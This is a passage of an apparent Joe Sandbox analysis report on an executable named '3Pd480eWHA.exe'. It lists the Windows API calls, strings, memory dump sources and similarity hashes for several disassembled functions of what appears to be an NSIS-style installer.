                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                              • String ID: %s=%s$NUL$[Rename]
                                                                                              • API String ID: 222337774-4148678300
                                                                                              • Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                                              • Instruction ID: 28628270b370f13d709f2e98436788b9d19fd6dde28ce54c0a079e884eb7da61
                                                                                              • Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                                              • Instruction Fuzzy Hash: 5A311371605B18ABD6206B215C89F6B3A6CDF45764F14013BFE01F22D2DA7CBC008EAD
                                                                                              APIs
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                              • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                              • String ID: @H3w
                                                                                              • API String ID: 3730416702-4275297014
                                                                                              • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                              • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                              • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                              • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                              APIs
                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\3Pd480eWHA.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\3Pd480eWHA.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                                              • CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                                              Strings
                                                                                              • *?|<>/":, xrefs: 00405FBF
                                                                                              • "C:\Users\user\Desktop\3Pd480eWHA.exe", xrefs: 00405FB3
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: "C:\Users\user\Desktop\3Pd480eWHA.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-2066206189
                                                                                              • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                              • Instruction ID: e323e08bdfda0f150b574f83967a69ba6361760ee6a09b3ffc5edc4c10c5e242
                                                                                              • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                              • Instruction Fuzzy Hash: 01118F91808B926EFB3216244C44B7BAF898B577A4F18007BE5C5722C2DA7C5C429B6E
                                                                                              APIs
                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 00403F75
                                                                                              • GetSysColor.USER32(00000000), ref: 00403F91
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403F9D
                                                                                              • SetBkMode.GDI32(?,?), ref: 00403FA9
                                                                                              • GetSysColor.USER32(?), ref: 00403FBC
                                                                                              • SetBkColor.GDI32(?,?), ref: 00403FCC
                                                                                              • DeleteObject.GDI32(?), ref: 00403FE6
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403FF0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                              • Instruction ID: 03c35b03fdde5f33accd48f8e357bf0732577442a8f103693b6bf1e6191b16fb
                                                                                              • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                              • Instruction Fuzzy Hash: 71216271904705ABCB219F68ED48B4BBFF8AF01715B04892AF996A22E0D734EA04CB55
                                                                                              APIs
                                                                                                • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                              • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 1780285237-0
                                                                                              • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                              • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                              • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                              • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040480B
                                                                                              • GetMessagePos.USER32 ref: 00404813
                                                                                              • ScreenToClient.USER32(?,?), ref: 0040482D
                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040483F
                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404865
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                              • Instruction ID: d51aeaa30401db709ca0a87e6a09b4ddb89123452d3ebce91a639796f0b83af5
                                                                                              • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                              • Instruction Fuzzy Hash: 54019275D00218BADB00DBA4CC41BFEBBBCAF85711F10412BBB10B71C0C7B465018BA5
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                              • MulDiv.KERNEL32(000D995F,00000064,000DAB48), ref: 00402BC5
                                                                                              • wsprintfA.USER32 ref: 00402BD5
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402BCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                                              • Instruction ID: 06d6233bfb864841df38fb05631849b064d35824abf3621066cb5e46443ac4cc
                                                                                              • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                                              • Instruction Fuzzy Hash: EE014F70540209FBEF209F60DD4AEAE3B69AB04304F00803AFA16B92D0D7B8A951DB59
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D3B
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                              • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                              • String ID: Tahoma
                                                                                              • API String ID: 3808545654-3580928618
                                                                                              • Opcode ID: 7cd5ed8a4b4f09cdd512241ed4d77026764b80ee4c75be1284d7c37bf19adfef
                                                                                              • Instruction ID: cf9238c777b6589bee1a324002302adcb4b1f2371c80511fc572ea77625e262b
                                                                                              • Opcode Fuzzy Hash: 7cd5ed8a4b4f09cdd512241ed4d77026764b80ee4c75be1284d7c37bf19adfef
                                                                                              • Instruction Fuzzy Hash: 96016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E2C67811569B3F
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00008A00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                              • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: c372e968d9e395b418133328b66b822104ab768b7d8a0d8c505769ff06cebaf7
                                                                                              • Instruction ID: f67dc9fade15bd1aaf4953b10d7ffc98cf8df4ed40540c93fb8cebdcb82cf2c3
                                                                                              • Opcode Fuzzy Hash: c372e968d9e395b418133328b66b822104ab768b7d8a0d8c505769ff06cebaf7
                                                                                              • Instruction Fuzzy Hash: 71217A71800128BBCF216FA5DE49EAEBB79EF09324F10022AF914762E1C7795D018B99
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                                              • wsprintfA.USER32 ref: 0040478C
                                                                                              • SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s$@y
                                                                                              • API String ID: 3540041739-3020698753
                                                                                              • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                                              • Instruction ID: 4638cabbc4a31f91baf710fec8468dae319bf79d1b1f68d9e24bb075fcb279e4
                                                                                              • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                                              • Instruction Fuzzy Hash: D911E7736041283BEB00656D9D45EEF328CDB86374F254237FA25F31D1EA78CC1146A8
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGlobal
                                                                                              • String ID:
                                                                                              • API String ID: 2979337801-0
                                                                                              • Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                                              • Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
                                                                                              • Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                                              • Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A9B
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                                              • Instruction ID: 557db050c0314b8bb5c0b22d2db4fc3530b60cfc711b7b252a141f8c1691c263
                                                                                              • Opcode Fuzzy Hash: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                                              • Instruction Fuzzy Hash: 82114272900109FFEF229F50DE89DAE3B7DEB54344B104436F901B10A0D7B59E51DB69
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
